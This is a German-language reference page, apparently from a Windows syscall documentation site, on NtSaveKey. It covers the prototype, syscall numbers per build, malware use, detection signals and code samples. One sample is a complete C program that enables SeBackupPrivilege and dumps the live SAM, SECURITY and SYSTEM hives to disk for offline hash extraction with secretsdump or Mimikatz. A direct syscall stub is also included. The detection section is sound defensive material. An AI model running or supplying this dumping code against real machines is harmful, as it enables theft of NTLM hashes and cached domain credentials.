> Windows Syscalls
ntoskrnl.exeT1003.002T1003.004T1106

NtSaveKey

Schreibt einen lebenden Registry-Schlüssel (mitsamt Teilbaum) in eine Hive-Datei — die Kernel-Seite des SAM/SECURITY-Diebstahls.

Prototyp

NTSTATUS NtSaveKey(
  HANDLE  KeyHandle,
  HANDLE  FileHandle
);

Argumente

NameTypeDirDescription
KeyHandleHANDLEinGeöffnetes Handle auf den Quellschlüssel (KEY_QUERY_VALUE erforderlich; der gesamte Teilbaum wird erfasst).
FileHandleHANDLEinGeöffnetes Handle auf die Zieldatei (mit GENERIC_WRITE auf einer leeren/neuen Datei geöffnet).

Syscall-IDs pro Windows-Version

Windows-VersionSyscall-IDBuild
Win10 15070x167win10-1507
Win10 16070x16Fwin10-1607
Win10 17030x175win10-1703
Win10 17090x178win10-1709
Win10 18030x17Awin10-1803
Win10 18090x17Bwin10-1809
Win10 19030x17Cwin10-1903
Win10 19090x17Cwin10-1909
Win10 20040x182win10-2004
Win10 20H20x182win10-20h2
Win10 21H10x182win10-21h1
Win10 21H20x184win10-21h2
Win10 22H20x184win10-22h2
Win11 21H20x18Cwin11-21h2
Win11 22H20x18Fwin11-22h2
Win11 23H20x18Fwin11-23h2
Win11 24H20x191win11-24h2
Server 20160x16Fwinserver-2016
Server 20190x17Bwinserver-2019
Server 20220x18Awinserver-2022
Server 20250x191winserver-2025

Kernel-Modul

ntoskrnl.exeNtSaveKey

Verwandte APIs

RegSaveKeyWRegSaveKeyExWNtSaveKeyExNtLoadKeyNtRestoreKey

Syscall-Stub

4C 8B D1            mov r10, rcx
B8 91 01 00 00      mov eax, 0x191
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undokumentierte Hinweise

NtSaveKey serialisiert einen lebenden Registry-Schlüssel mit komplettem Teilbaum in eine Datei im Hive-Format. Die Ausgabedatei ist ein *vollwertiges Hive*: byte-kompatibel mit den On-Disk-Dateien SAM, SYSTEM, SECURITY. Der Caller benötigt **SeBackupPrivilege**. NtSaveKey ist die Originalversion; `NtSaveKeyEx` fügt einen Flags-Parameter hinzu (`REG_STANDARD_FORMAT` vs `REG_LATEST_FORMAT`). Win32-Wrapper sind `RegSaveKeyW` / `RegSaveKeyExW`.

Häufige Malware-Nutzung

Dies ist der **kanonische Weg ohne VSS, um Live-SAM- und SECURITY-Hives zu stehlen**: `HKLM\SAM` und `HKLM\SECURITY` öffnen (erfordert SYSTEM-Rechte oder Impersonation) und dann per NtSaveKey an einen beschreibbaren Ort wegspeichern. Die entstehenden Dateien werden anschließend mit `secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` (Impacket) oder Mimikatz `lsadump::sam` weiterverarbeitet, um NTLM-Hashes, DPAPI-Master-Keys, gecachte Domänen-Credentials und LSA-Secrets zu extrahieren — *ohne* dass eine Volume Shadow Copy erstellt werden müsste (die stark überwacht ist). Impackets `reg.py save` ist genau diese Primitive über RemoteRegistry/SMB. SeBackupPrivilege selbst ist der Bypass — es überschreibt DACLs beim Lesen, sodass selbst Schlüssel, die der lokalen Administratoren-Gruppe ausdrücklich verweigert sind, lesbar werden.

Erkennungs­möglichkeiten

Sysmon Event 11 (FileCreate) auf Hive-Format-Dateien außerhalb von `%SystemRoot%\System32\config\` ist das verlässlichste Signal — kombiniert mit Events 13 / 12 auf Öffnen von `HKLM\SAM` oder `HKLM\SECURITY` unmittelbar davor. ETW `Microsoft-Windows-Kernel-Registry` liefert explizite Save-Hive-Events mit Quellschlüssel und Zielpfad. Aktivierung von SeBackupPrivilege (Sysmon 4673 mit `SeBackupPrivilege` in der Privilegienliste) durch einen Nicht-Backup-Prozess ist hochaussagekräftig. `reg.exe save HKLM\SAM` und PowerShell-Äquivalente erkennen, und auf jeden SYSTEM-prozess-geschriebenen Hive-Magic-Header (`regf`) außerhalb der Config-Verzeichnisse achten.

Direkte Syscall-Beispiele

asmx64 direct stub (Win11 24H2)

; Direct syscall stub for NtSaveKey (SSN 0x191 on Win11 24H2 — drifts per build)
NtSaveKey PROC
    mov  r10, rcx          ; KeyHandle
    mov  eax, 191h         ; SSN
    syscall
    ret
NtSaveKey ENDP

cLive SAM/SECURITY extraction skeleton

// Dump SAM and SECURITY hives without touching Volume Shadow Copy.
// Requires SYSTEM context AND SeBackupPrivilege enabled.
#include <windows.h>

static BOOL EnableBackupPriv(void) {
    HANDLE tok; TOKEN_PRIVILEGES tp = {0};
    if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_ADJUST_PRIVILEGES, &tok)) return FALSE;
    LookupPrivilegeValueW(NULL, SE_BACKUP_NAME, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL)
              && GetLastError() == ERROR_SUCCESS;
    CloseHandle(tok);
    return ok;
}

LONG DumpHive(LPCWSTR root, LPCWSTR outPath) {
    HKEY hKey = NULL;
    LONG s = RegOpenKeyExW(HKEY_LOCAL_MACHINE, root,
                            REG_OPTION_BACKUP_RESTORE, KEY_READ, &hKey);
    if (s != ERROR_SUCCESS) return s;
    DeleteFileW(outPath);
    s = RegSaveKeyExW(hKey, outPath, NULL, REG_LATEST_FORMAT);
    RegCloseKey(hKey);
    return s;
}

int wmain(void) {
    if (!EnableBackupPriv()) return 1;
    DumpHive(L"SAM",      L"C:\\stage\\SAM.hiv");
    DumpHive(L"SECURITY", L"C:\\stage\\SECURITY.hiv");
    DumpHive(L"SYSTEM",   L"C:\\stage\\SYSTEM.hiv");
    return 0;
}

rustDirect NtSaveKey via ntapi

// Cargo: ntapi = "0.4", winapi = { version = "0.3", features = ["winnt", "handleapi"] }
use ntapi::ntregapi::NtSaveKey;
use winapi::shared::ntdef::{HANDLE, NTSTATUS};

unsafe fn save_hive(key: HANDLE, file: HANDLE) -> NTSTATUS {
    // Caller is expected to have already enabled SeBackupPrivilege
    // and opened `key` with KEY_QUERY_VALUE and `file` with GENERIC_WRITE.
    NtSaveKey(key, file)
}

MITRE ATT&CK-Mappings

Last verified: 2026-05-20